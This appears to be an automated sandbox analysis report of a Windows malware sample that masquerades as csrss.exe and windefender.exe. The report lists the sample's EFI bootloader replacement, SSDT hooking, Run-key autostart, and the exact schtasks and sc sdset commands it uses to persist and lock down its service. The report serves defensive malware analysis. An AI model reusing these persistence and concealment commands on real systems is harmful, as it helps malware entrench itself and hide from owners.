          Source: jkDmft1Qoe.exe Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: jkDmft1Qoe.exe Static file information: File size 9054208 > 1048576
          Source: jkDmft1Qoe.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x29d400
          Source: jkDmft1Qoe.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2eaa00
          Source: jkDmft1Qoe.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x31a000
          Source: Binary string: Loader.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: symsrv.pdb source: jkDmft1Qoe.exe, 00000000.00000002.668856780.0000000000C57000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665347802.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.676233642.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000011.00000002.701096602.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000016.00000002.702361556.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.697442468.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.707266801.0000000000C57000.00000008.00020000.sdmp
          Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: Unable to locate the .pdb file in this location source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: The module signature does not match with .pdb signature. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: .pdb.dbg source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: '(EfiGuardDxe.pdbx source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000020.00000002.722682252.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: symsrv.pdbGCTL source: jkDmft1Qoe.exe, 00000000.00000002.668856780.0000000000C57000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665347802.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.676233642.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000011.00000002.701096602.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000016.00000002.702361556.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.697442468.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.707266801.0000000000C57000.00000008.00020000.sdmp
          Source: Binary string: or you do not have access permission to the .pdb location. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: EfiGuardDxe.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000020.00000002.722682252.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: dbghelp.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: dbghelp.pdbGCTL source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: C:\Windows\rss\csrss.exe Code function: 17_2_118B6686 push ss; retn 001Dh 17_2_118B6687
          Source: jkDmft1Qoe.exe Static PE information: section name: .symtab
          Source: csrss.exe.4.dr Static PE information: section name: .symtab
          Source: windefender.exe.10.dr Static PE information: section name: UPX2
          Source: injector.exe.10.dr Static PE information: section name: _RDATA
          Source: EfiGuardDxe.efi.10.dr Static PE information: section name: .xdata
          Source: NtQuerySystemInformationHook.dll.10.dr Static PE information: section name: _RDATA
          Source: bootx64.efi.10.dr Static PE information: section name: .xdata
          Source: bootmgfw.efi.10.dr Static PE information: section name: .xdata
          Source: jkDmft1Qoe.exe Static PE information: real checksum: 0x0 should be: 0x8b176f
          Source: EfiGuardDxe.efi.10.dr Static PE information: real checksum: 0x4a5a6 should be: 0x51a75
          Source: bootx64.efi.10.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
          Source: bootmgfw.efi.10.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
          Source: csrss.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x8b176f
          Source: injector.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x54ea2
          Source: windefender.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x20ae45
          Source: NtQuerySystemInformationHook.dll.10.dr Static PE information: real checksum: 0x0 should be: 0x2279d
          Source: initial sample Static PE information: section name: UPX0
          Source: initial sample Static PE information: section name: UPX1

          Persistence and Installation Behavior:

          Creates files in the system32 config directory
          Source: C:\Windows\System32\netsh.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub
          Drops executables to the windows directory (C:\Windows) and starts them
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Executable created and started: C:\Windows\rss\csrss.exe
          Source: unknown Executable created and started: C:\Windows\windefender.exe
          Drops PE files with benign system names
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe File created: C:\Windows\rss\csrss.exe
          Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi
          Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi
          Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi
          Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Boot\old.efi (copy)
          Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
          Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
          Source: C:\Windows\rss\csrss.exe File created: C:\Windows\windefender.exe
          Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Microsoft\Boot\fw.efi (copy)

          Boot Survival:

          Creates an autostart registry key pointing to binary in C:\Windows
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SilentDust
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

          Hooking and other Techniques for Hiding and Protection:

          May modify the system service descriptor table (often done to hook functions)
          Source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
          Source: jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
          Source: csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
